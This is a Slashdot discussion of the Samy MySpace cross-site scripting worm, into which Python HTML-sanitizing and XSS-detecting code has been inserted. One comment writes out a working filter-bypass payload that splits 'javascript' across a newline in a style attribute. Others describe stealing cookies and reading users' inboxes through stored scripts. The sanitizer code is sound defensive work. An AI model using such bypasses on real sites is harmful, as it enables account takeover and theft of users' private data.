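            url = safe_url(attrs.get(url_attr))
            if url is None:                # bad scheme: drop the whole link/image
                self.dropped.append(tag)
                return
            kept = f' {url_attr}="{html.escape(url, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")  # every other attribute is discarded

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == self.suppress:
            self.suppress = None
        if tag in ("shieldson", "shieldsoff"):
            return
        if tag in self.dropped:
            self.dropped.remove(tag)
            return
        if self.lock is None or tag in self.allowed:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.suppress is None:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        if self.lock is None:
            self.out.append(f"<!--{data}-->")


def apply_shields(document):
    """Return the document with every shielded region reduced to its allowlist."""
    p = ShieldFilter()
    p.feed(document)
    p.close()
    return "".join(p.out)
```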
    1. Re:Not the first worm of that type by Anonymous Coward · · Score: 0

      try <pre></pre>

  • About (2?) years ago by lupid · · Score: 5, Interesting

    I did this. They were more lenient with the javascript back then. You had to use escape characters, but it was no big deal. I wrote a self-propagating worm that changed a user's name to the source of my script. Then I inserted that code into my name. Everyone on myspace had their name changed to 'lupidvirus' after about 6 hours. I got a call from their lawyers the next day at work.

    Mine propagated faster than this one because it didn't rely on profile views. Anytime you saw the name, whether it be in a comment, profile, or search, you would be infected. However, with the script executing 100 times per page view, myspace's servers quickly became overloaded and crashed (I didn't really expect it to work). I also essentially staged a DDoS attack against my web server which was hosting the script (it needed to be hosted in order to fit in the 'name' field).

    Another note: myspace never removed the scripts that were saved before they outlawed javascript. To this day, I can read a user's inbox and sent messages when they view my profile. I also was going to write a DHTML roleplaying game that ran on myspace, but they locked that account because of the virus. It still plays music and lets you manipulate your inventory though =D

    1. Re:About (2?) years ago by Anonymous Coward · · Score: 0
      To this day, I can read a user's inbox and sent messages when they view my profile.

      Since myspace know who you are, do you really want to be admitting this in public? Still, what are the chances of them reading this article ... about myspace?

  • Developers just don't care by LlamaGui · · Score: 2, Informative

    About a year ago, I discovered a bug in xanga.com's software that would allow anyone to use any javascript they wanted. Xanga simply made 1 pass through to remove any tags... so all you had to do was write <script> and </script>. I created a proof of concept that would allow me to capture a user's cookies and send them to an offsite PHP script, totally transparent to the victim. You could then simply replace the victim's cookie with yours, and have total control of their account.

    So I took my discovery and emailed it to their designated bug report address. 5 months later it was finally fixed. I've found other vulnerabilities that would allow anyone to do the same thing, but I don't even want to bother writing a proof of concept and telling them about it. Most companies just don't see XSS as a danger until someone wreaks some havoc.

  • Re: XSS Comes Of Age by EddyPearson · · Score: 1

    Wow! Very clever! Before now (for me anyway) XSS has just been a "bug" rather than a "vulnerability", and apart from the odd phishing attack or sneaky password stealing I never really saw a practical application for it until now.

    Oh, and just to get in the obligatory M$ bashing session, whose fault was this entire thing?? MSIE!!! Owing to their clear disregard for HTML standards. MySpace (who never asked to be browsed by IE!) had to take their site offline because of the care-free people.

    I leave you with this: If this is possible, what else is vulnerable to XSS+AJAX?

    --
    You feel sleepy. Close your eyes. The opinions stated above are yours. You cannot imagine why you ever felt otherwise.
  • Just a question... by strider44 · · Score: 2, Insightful

    This guy used the tag to insert the javascript, which slashdot also allows. Not that I'm wanting anyone to do something evil with it, but I'm wondering: could slashdot be susceptible to the same flaw they're reporting?

    1. Re:Just a question... by drew · · Score: 1

      What he did wasn't particular to the div tag; he could have done it with any tag. Mainly he used the fact that IE a) allows javascript within style attributes, and b) interprets "java\nscript" the same as "javascript". So any site that allows you to post the following would be susceptible, no matter which individual tags they allow or disallow:

      <b style="background: url('java
      script:alert(1)');">pwned</b>

      --
      If I don't put anything here, will anyone recognize me anymore?
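      The split-token trick drew describes, seen from the filter's side, as an added example that is not from this thread or from any site's real filter: the check normalizes each attribute value (entities decoded, whitespace and control characters removed, case folded) before looking for a script scheme or a CSS expression, so "java\nscript" is refused on whatever tag carries it. The tag and attribute lists and the sample markup are assumptions.

```python
"""Normalize-then-check scanner for attribute-borne script.

Added example, not from the thread or any real filter: the lists of tags,
attributes and schemes below are assumptions; sample markup is constructed.
"""
import html
import re
from html.parser import HTMLParser

# Characters a lenient parser ignores inside a token; dropping them turns
# "java\nscript" (or a tab- or NUL-spliced form) back into "javascript".
_IGNORED = re.compile(r"[\x00-\x20\x7f]")
_SCRIPT_SCHEME = re.compile(r"^(?:javascript|vbscript|data):")
# CSS that IE of the period would execute: script URLs and expression().
_CSS_SCRIPT = re.compile(r"(?:url\(\s*['\"]?(?:javascript|vbscript):|expression\()")


def normalize(value):
    """Decode entities until stable, drop ignored characters, lowercase."""
    prev = None
    while value != prev:            # &amp;#106; -> &#106; -> j : loop until stable
        prev, value = value, html.unescape(value)
    return _IGNORED.sub("", value).lower()


def attribute_is_dangerous(name, value):
    """Decide on the normalized value, never on the raw one."""
    name = name.lower()
    norm = normalize(value or "")
    if name.startswith("on"):                       # onmouseover, onload, ...
        return True
    if name in ("href", "src", "action", "background"):
        return bool(_SCRIPT_SCHEME.match(norm))
    if name == "style":
        return bool(_CSS_SCRIPT.search(norm))
    return False


class DangerousMarkupScanner(HTMLParser):
    """Collects (tag, attribute) pairs a filter should refuse, on any tag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "object", "embed", "applet", "iframe"):
            self.findings.append((tag, None))
        for name, value in attrs:
            if attribute_is_dangerous(name, value):
                self.findings.append((tag, name))

    handle_startendtag = handle_starttag


def scan(fragment):
    """Return every (tag, attribute) that carries script after normalization."""
    s = DangerousMarkupScanner()
    s.feed(fragment)
    s.close()
    return s.findings
```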
  • Prosecute? by Evil+W1zard · · Score: 1

    So is MySpace.com going to bring criminal charges against this individual for creating and propagating malcode? Outright it may have done no damage, but they may be able to claim damages caused from shutdown and cleanup...

    --
    News Reporters Make Tasty Polar Bear Treats!
  • Spoon by debrain · · Score: 1

    I believe it was called a spoon.

  • Look on the bright side! by JonTurner · · Score: 2, Funny

    >>I bet he doesn't have over 1 million friends now.

    No kidding. But look on the bright side -- he has dramatically increased his chances of having at least one *very* close, long-term friend. Bubba, meet your new cellmate, "Samy."

  • The Cross Site Scripting FAQ by webappsec · · Score: 1
  • Re:And the phrase for self-replicating viruses was by Em7add11 · · Score: 3, Funny

    And the phrase for self-replicating viruses was "gossip". Unfortunately, the viruses would occasionally replicate with mutations, but this only made them stronger.

    At my school, I think it was called "herpes".

  • The Moral is... by gallwapa · · Score: 1

    Use a NON IE browser. I enjoy Firefox myself. In fact, with Firefox, I block all those crappy embedded music videos people have 2934234092 of on their profiles.

  • Evolution in Action by Doc+Ruby · · Score: 2, Insightful

    After patching to fix this problem, MySpace now becomes the most immune to these types of attacks. Their software is more resistant, their team is more educated. To mix punchlines, pioneers get the arrows, but blows that do not break the back, strengthen it.

    --

    --
    make install -not war

    1. Re:Evolution in Action by Anonymous Coward · · Score: 0

      No, they just wasted some of their time due to Microsoft incompetence. If I were them I would simply report the bug to Microsoft and do nothing except block IE from the application.

      When you patch a security problem, by the way, you haven't gotten "stronger", you simply "failed". Security issues should never be put in software to begin with. No pioneers, no arrows. Just a system that takes in finite byte strings and returns finite byte strings.

    2. Re:Evolution in Action by Doc+Ruby · · Score: 1

      The last part of your message slips into unintelligibility. But the first part is worth responding to. It's obvious that all Internet apps have bugs, including security holes. Which get closed as they get exposed. Now MySpace has a competitive advantage against their competitors, because they are better equipped to deal with the next one, and that problem is no longer active in their system. Their competitors are not as experienced, so this worm can hit them, too.

      You can't let your idea of a perfect Internet conflict with understanding the reality of the imperfect one we've got. You've got to accept that we're in an evolution scenario, where the stresses of the Internet select some systems more fit to survive, in both technical and business terms. Survivors are stronger than those untested, and business especially selects for known risks, rather than those untested. So while any individual security problem is unwelcome, we have to accept their reality. And look for actual differences in value among all of those exposed to them. MySpace, if they mutate to accommodate this environmental development, will be better suited to survive than their competitors. Which means "winner" in the evolution game.

      --

      --
      make install -not war

  • This threat has been known about for ages. by James+A.+Y.+Joyce · · Score: 0

    I wrote a Kuro5hin article documenting exactly this sort of problem some time ago. It's about Xanga, but it applies just as much to MySpace.

  • There is no spoon! by Anonymous Coward · · Score: 0

    Didn't you see The Matrix?

  • In jail... by thrill12 · · Score: 1

    ... everyone will be your friend. Really...

    --
    Slashdot: stuff for news, nerds that matter, matter for news, stuff that nerd
  • Kitty. by RonaldReagan · · Score: 0

    I feel embarrassed for the guy's cat. I never saw his webpage, but I only assume he had pictures of his cat on there. That cat probably doesn't even want to be seen in public now.

  • And then he said... by SethD · · Score: 1

    "Get back foo! You're invading MySpace!"

  • LiveJournal Took up the Responsibility by BobPaul · · Score: 4, Informative

    LiveJournal's cleanhtml.pl already covers multiline splits in IE. It's not like IE's interpretation of single tags split over multiple lines hasn't been known about for quite some time.

    I completely agree that IE is the problem, but to say that this is something site administrators couldn't have been prepared for is untrue. To expect a self replicating javascript? No way. But to secure the filter to prevent multiline tags? Yes, cleanhtml.pl already does. It's known and out there already.

    1. Re:LiveJournal Took up the Responsibility by mdecarle · · Score: 1

      Speaking of which, the LiveJournal infrastructure is a real gem! Brad did a good job building and maintaining that site. Have you ever seen those slideshows about the underlying infrastructure (servers, datalines, and such)? Cool.

      Of course, there's the occasional hiccup. (See also: Blackout Analysis)

  • IE... What? by PickyH3D · · Score: 1
    Thankfully, the script was written for fun and didn't try to take advantage of unpatched security holes in IE to create a massive MySpace botnet.
    Luckily, DJ_Vegas has NO IDEA what he is talking about and simply wanted to take a shot at IE.
  • Re:Day late, dollar short. by jschrod · · Score: 1

    I would even say that the moderation works quite well. Just wait a few hours and read at +4 or +5. You will find well-balanced selection of comments, actually.

    --

    Joachim

    People don't write Manifestos any more -- what's going on in this world? [Frank Zappa]

  • Re:Day late, dollar short. by Anonymous Coward · · Score: 0

    Slashdot Mods smoke crack! News at 11

    Parent is +5 Insightful, should be -1 Offtopic
    This is why Slashdot has such high noise-to-signal.

  • Clever myspace user?!? by bingo4000 · · Score: 1

    One clever MySpace user

    Wouldn't it be more accurate to say "THE clever MySpace user"?

  • Re:Day late, dollar short. by Anonymous Coward · · Score: 0

    If /. sucks so much, why are you still here?

    That's the problem: It sucks so much that I can't pull myself away. Plus, someone has got to keep spoonfeeding reality to some of you feebs.

  • My Hero by Xytheril · · Score: 2, Funny

    I can see it now that this sounds like the plot for a Sci Fi movie. Guy inserts code into Myspace. Myspace then becomes conscious and starts rampaging across the internet, trying to get people to be its friends. If they don't, it bombards them with pictures of slashed wrists. Then some B movie actors like Gary Busey and John Rhys Davies have to "go into the internet" using some kind of virtual reality rig and kill Myspace. I've already pitched the idea. It'll be debuting next year.

  • The consequences by Anonymous Coward · · Score: 0

    would have been much more interesting on adultfriendfinder!

  • Not the first attack of this kind ... by stevey · · Score: 1

    The open source site Advogato was hit by a similar profile-page-virus in 2002.

    But it was a neat hack, and kudos to Samy!

  • www.mrfixitonline.com 2001 by RedLaggedTeut · · Score: 1

    There was a similar opportunity at http://www.mrfixititonline.com/ in 2001, since you could use javascript in your signatures. In their infinite wisdom, instead of fixing the hole, they made using signatures a subscription-only "gold" feature. Now that's a business model ;-)

    --
    I'm still trying to figure out what people mean by 'social skills' here.
  • You know you are a loser... by br0pbr0p · · Score: 2, Insightful

    When you have to write a script to get friends...

    1. Re:You know you are a loser... by Anonymous Coward · · Score: 0

      With any luck, he can make plenty of friends in prison. Unfortunately it's doubtful he'll see any jail time even though he deserves it. Whatever his intent was, hacking the system is illegal.

  • It hasn't hit me... by Landshark17 · · Score: 1

    ...I've still only got 4 myspace friends. *sighs*

    --
    This sig is false.
  • "Samy says his intentions weren't malicious" by Anonymous Coward · · Score: 0

    Robert Tappan Morris might be able to suggest some good lawyers.

  • XSS by leighklotz · · Score: 1

    I wrote an XSS filter based on TagSoup and SAX filters.

  • The exploit itself by Anonymous Coward · · Score: 0

    Taken from http://namb.la/popular/tech.html this is the exploit he used:


  • You can run Javascript in myspace... by r2tincan · · Score: 1

    ...if it's hidden in Flash.

    --
    "Lead my skeptic sight."
  • How he did it by Sheepdot · · Score: 3, Informative

    From the horse's mouth:
    http://namb.la/popular/tech.html

  • I added you to my foes list by bxbaser · · Score: 1

    1 million foes ....
    everyone's got to have a dream, and mine starts now

  • What about Hex code? by Anonymous Coward · · Score: 0

    What if you were to convert it all to hex? wouldn't the Browser then execute the code after it formatted it from hex?

  • One clever MySpace user by Nom+du+Keyboard · · Score: 1

    I hope he's One clever ex-MySpace user permanently.

    --
    "It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
  • Re:Day late, dollar short. by JeremyALogan · · Score: 1

    Did you stop to consider that /. IS slow? I read a few other news aggregation sites every day and /. is almost universally a day or two behind the others. These aren't news sites I'm comparing it to here, but other aggregators. It's gotten so that I read BoingBoing thoroughly and just scan /. to see what I missed. It's a problem of the editors not caring. Based on story submissions that several people I know and myself have gotten rejected only to see the same story a few days later, I think they aren't fully checking the stories that come in. It seems to me like they're looking at the inbox saying "sheesh... 500 messages", reading maybe the first 50 and then just rejecting the others. Maybe after they see the same subject enough times they'll click it to see what's up. It's pretty clear that the editors don't care as much as they used to... just look at all the dupes we get.

  • Thank God by Lisandro · · Score: 1

    Thankfully, the script was written for fun and didn't try
    to take advantage of unpatched security holes in IE to create a massive MySpace botnet.

    Yeah. That would've been a tragedy.

  • Tom by Anonymous Coward · · Score: 0

    Tom did it first.

  • Re:Day late, dollar short. by Anonymous Coward · · Score: 0

    Saw it a day ago on http://www.reddit.com/ .

  • Must...resist...cliche by !emus · · Score: 0

    In Soviet Russia, your heros choose you!

    Ah well, 1 offtopic post as a new user already hosed my karma, this post probably won't be seen by anyone anyway.

    --
    "It's hard to bargle nawdle zouss
    With all these marbles in my mouth
    "
  • *i* want them reading it by Anonymous Coward · · Score: 0


    i don't even use myspace and i want myspace reading that comment. it's totally irresponsible that they bothered to disable javascript but didn't audit existing data for it. somebody claiming that in public with an identifiable name might get them off their asses.

    it doesn't affect me for a variety of reasons, but the last thing anybody needs is another major security vulnerability for lots of people.

  • Deja vu... by Anonymous Coward · · Score: 0

    Just reading the article brought back a flood of memories of when I used to be a hardcore user of the site AsianAvenue, where I did many of the same things mentioned in the article. I also found out how to insert raw HTML in my profile, and how to automatically have anyone who visited my page become a "friend", although it wasn't self-propagating. I also knew how to have people automatically sign my guestbook also...

    Fun times.

  • HA by Anonymous Coward · · Score: 0

    HA HA HA HA HA
    /sorry
    //thought this was fark

  • I think its fake by Anonymous Coward · · Score: 0

    I think it's fake. I use myspace A LOT. I probably browse 100+ profiles a day and I didn't get this worm; I have never even heard of it until a few days ago when I was linked to a page that the sammy guy wrote about it. I use IE, so all the scripting would have hit me, and I've never heard anyone on my buddy list bitching about it in a bulletin or some chain bulletin telling people to watch out for it. I see no proof behind it other than some guy saying he did it, and myspace being down for a while. The thing is myspace is down all of the time; they have horrid backend code. I get random errors all the time and there is almost always at least an hour of downtime every day.

  • myspace is too buggy... by Anonymous Coward · · Score: 0

    myspace already has enough bugs in it; there's already several ways to get javascript working on that site. It just took a couple months for some guy willing enough to script something like this to figure that out, and I think it's about time.

  • +1, Funny but -1, Wrong by Atario · · Score: 1
    code that infects your browser
    It does no such thing. It changes settings in a website. Assuming he's not using some actual exploit, and just doing the kind of thing he explains about (it's really an interesting read, I suggest you have a look), the "worst that could happen" would be that he gets you to spew a bunch of requests at his own site.
    --
    "A great democracy must be progressive or it will soon cease to be a great democracy." --Theodore Roosevelt
    1. Re:+1, Funny but -1, Wrong by Hosiah · · Score: 1
      (it's really an interesting read, I suggest you have a look)

      FTFA:
      "The next step was to simply instruct the Web browser to load a MySpace URL that would automatically invite Samy as a friend"
      ???

    2. Re:+1, Funny but -1, Wrong by Anonymous Coward · · Score: 0

      through HttpRequest JavaScript object, which only works on the same website you are currently on

    3. Re:+1, Funny but -1, Wrong by Atario · · Score: 1

      Right. Your browser pretends to do something you can do yourself by filling in a form or clicking a link or whatever. Then it's done. "Infect your browser" implies there's something changed about your browser, rather than just your MySpace settings.

      --
      "A great democracy must be progressive or it will soon cease to be a great democracy." --Theodore Roosevelt
    4. Re:+1, Funny but -1, Wrong by Hosiah · · Score: 1

      "enslave your browser", then???

  • Paving material by benhocking · · Score: 1

    OK, I can somewhat defend the good intentions behind rendering poor html, but I'm going to have to go ahead and give you a rousing "Amen, brother!" on the FrontPage point.

    --
    Ben Hocking
    Need a professional organizer?
    1. Re:Paving material by Bert64 · · Score: 1

      Rendering poor html had nothing to do with good intentions, it was purely an easier way of making Netscape look bad than actually creating a better browser..
      If no browsers rendered broken html, then no websites would be using broken html... No one creates a website without testing it in at least one browser before putting it online, and if none of the available browsers would tolerate errors then the quality of html code out there would be that much higher.

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  • With lynx ? by Gopal.V · · Score: 1

    Whenever someone says something about viral-scripting - I just paste the link into lynx (or links) and view it.

  • Not feeling cynical enough lately by benhocking · · Score: 1

    I choose not to believe that. I don't credit anyone with that much foresight. I think that, as usual, MS was just catering to the lowest common denominator ("No one ever went broke or lost a campaign by overestimating the public's stupidity"), and the side "benefits" you mentioned just happened by chance (well, not exactly chance, but you know what I mean). Sure, you can blame them for contributing to the glut of poorly written HTML, on at least two different levels, but I refuse to believe that their choice to render poor html was part of some vast Microsoft-wing conspiracy. ;)

    --
    Ben Hocking
    Need a professional organizer?
    1. Re:Not feeling cynical enough lately by Bert64 · · Score: 1

      What reason could they possibly have other than to discredit Netscape?
      It's not as if there was already a large amount of poorly formed html floating around.. Because no browser at the time would render poorly formed html, people never deployed anything like that...
      If a browser maker released a browser today which was intentionally tolerant of bad html then you could claim it was doing so for convenience so it would display the thousands of badly formed sites out there, but back when Microsoft made the decision to make IE tolerant of html errors, there simply weren't any sites out there that needed it..
      But by producing a browser that tolerated poor html, Microsoft ensured a greater chance of such sites being created..
      Microsoft correctly assumed that the majority of end users would see a site display in IE and not in Netscape, and assume that Netscape was broken/inferior... And a lot of end users creating such sites, would simply not bother making it work in the "broken" Netscape browser..

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
  • Just a thought... by Jennasaurus · · Score: 1

    Ok, I understand that he did this for laughs and all, I commend him for this only because it shows he is probably the only Myspace user on the network that would be able to pull this off, or else somebody else would have already! But yet, why cause mischief and have a network have to go offline? Yet I think if I was smart enough to pull this off I probably would have done the same!^_^ I mean I'm just starting out and learning about HTML and CSS! But also... it really peeves me that some of the articles said all of the network's users became a victim of this and other articles said a certain amount! Not all users and/or profiles were affected by this! My profile was fine and was never taken offline. But still kudos to "samy" for his achievements, I'm just a little baffled on a few things having to do with this!

    --
    "They stole my lie"
  • MySpace worm wasn't first by kristaps.kaupe · · Score: 1

    Actually, this wasn't the "first self-propagating cross-site scripting (XSS) worm". This was the second. The first was written three months ago by Latvian hacker Lethal for the Latvian Friendster-like website Draugiem.lv. That worm was called Draugberts.

  • Re:Day late, dollar short. by SillyNickName4me · · Score: 1

    Actually, securityfocus links to the slashdot article as 'news'. Usually that is the other way around.. so I guess in this case Slashdot was not that slow, and actually managed to post something that 'matters'. :)